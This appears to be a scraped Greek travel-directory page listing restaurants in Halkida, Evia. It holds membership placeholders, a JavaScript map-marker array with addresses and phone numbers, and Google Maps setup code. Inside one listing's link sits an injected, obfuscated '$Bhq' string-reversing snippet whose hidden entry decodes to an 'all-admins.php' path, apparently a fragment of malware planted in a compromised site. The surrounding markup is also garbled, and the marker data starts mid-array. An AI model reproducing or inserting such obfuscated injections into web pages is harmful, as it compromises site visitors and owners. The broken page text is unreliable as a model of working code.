Phone No - For Silver or Gold Package Only
Website - For Gold Package Only
Email - For Silver or Gold Package Only
.. μόνο σε Golden Members!
<a itemprop="url" href="https://www.travels.com.gr/city/halkida/listing/ouzeri-$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarno/" title="Ouzeri Tou Thanasi" rel="bookmark">Ouzeri Tou Thanasi
Phone No - For Silver or Gold Package Only
Website - For Gold Package Only
Email - For Silver or Gold Package Only
.. μόνο σε Golden Members!
Phone No - For Silver or Gold Package Only
Website - For Gold Package Only
Email - For Silver or Gold Package Only
.. μόνο σε Golden Members!
Phone No - For Silver or Gold Package Only
Website - For Gold Package Only
Email - For Silver or Gold Package Only
.. μόνο σε Golden Members!
Restaurant in Halkida, Evia, Central Greece
Travel catalog and tourist catalogue, Restaurant in Halkida, Evia, Central Greece, best prices
Restaurant in Halkida, Evia, Central Greece hotels, villas, restaurants, shops, businesses
Find the best prices for accommodation and food for place to visit in Restaurant in Halkida, Evia, Central Greece
topolion 1922','location': [38.462296, 23.592157],'message':'
19 Vaki Al., Khalkis 341 00, Greece
Gastronomy | Restaurant
+30 2221 083111
http://
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113512'},{'name':'Frenzi','location': [38.46479, 23.59234],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113514'},{'name':'Stavento','location': [38.4687, 23.594036],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113516'},{'name':'Symposio O Georgos','location': [38.456078, 23.594587],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113518'},{'name':'Special Food and Coffee','location': [38.458378, 23.596546],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113520'},{'name':'To Thalami Ouzeri','location': [38.47404, 23.603506],'message':'
Ethnikis Symfiliosis 78 Perioxi Fanari, Khalkis 341 00, Greece
Gastronomy | Restaurant
+30 2221 074442
http://www.tothalami.gr/
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113521'},{'name':'Ouzeri Apanemo','location': [38.474007, 23.603882],'message':'
78 Ethnikis Simfiliossis, Khalkis 341 00, Greece
Gastronomy | Restaurant
+30 2221 022614
http://
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113523'},{'name':'O Michos Tavern','location': [38.48077, 23.627922],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113525'},{'name':'To Kioupi Mezedopoleio','location': [38.4726, 23.63231],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113527'},{'name':'Amerikanos','location': [38.439068, 23.626654],'message':'
6 Ellispodou, Khalkis 341 00, Greece
Gastronomy | Restaurant
+30 2221 076776
http://
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113528'},{'name':'Ouzeri Tou Thanasi','location': [38.43823, 23.627256],'message':'
St. Trifonas Square, Khalkis 341 00, Greece
Gastronomy | Restaurant
+30 2221 028330
http://
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113530'},{'name':'Almira nel mar','location': [38.48941, 23.56731],'message':'
Agios Minas Beach, Agios Minas 34100, Greece
Gastronomy | Restaurant
302221097111
http://
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113507'},{'name':'Ouzeri Evripos','location': [38.461536, 23.589699],'message':'
','icons':'http://www.etravel.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'113508'}];
var clustering = '';
var map;
var mgr;
var markerClusterer;
var markerArray = [];
var mClusterer = null;
var pippoint_effects='click';
var infoBubble = new InfoBubble({maxWidth:210,minWidth:210,minHeight:"auto",padding:0,borderRadius:0,borderWidth:0,overflow:"visible",backgroundColor:"#fff"});
var isDraggable = jQuery(document).width() > 480 ? true : false;
var isscrollwheel = jQuery(document).width() > 480 ? true : false;
var dragging = zoom_changed = false;
var bounds_modified = false;
var new_bounds;
var query_string='post_type=listing&taxonomy=listingcategory&slug=restaurant';
var zoom_changed=1;
function initialize() {
bounds = new google.maps.LatLngBounds();
var myOptions = {
scrollwheel: isscrollwheel,
draggable: isDraggable,
zoom: CITY_MAP_ZOOMING_FACT,
center: new google.maps.LatLng(CITY_MAP_CENTER_LAT, CITY_MAP_CENTER_LNG),
mapTypeId: google.maps.MapTypeId.ROADMAP }
map = new google.maps.Map(document.getElementById("map_canvas"),myOptions);
/* map style customizer */
var styles = [];
map.setOptions({styles: styles});
/* Add Google Map marlkers */
mgr = new MarkerManager( map );
templ_add_googlemap_markers(markers);
if ( zoom_option==1) {
map.fitBounds(bounds);
map.setCenter(bounds.getCenter( ) ) ;
}
/* but that message is not within the marker's instance data */
google.maps.event.addListener(map, 'dragstart', function() {
dragging = false;
});
google.maps.event.addListener(map, 'dragend', function() {
dragging = true;
});
google.maps.event.addListener(map, 'bounds_changed', function() {
bounds_modified = true;
new_bounds = map.getBounds();
});
google.maps.event.addListener(map, 'zoom_changed', function() {
if ( zoom_changed!=1) {
dragging = true;
}
zoom_changed=0;
});
google.maps.event.addListener(map, 'idle', function(ev) {
/*new_bounds = map.getBounds();*/
refresh_markers();
});
}
google.maps.event.addDomListener(window, 'load', initialize);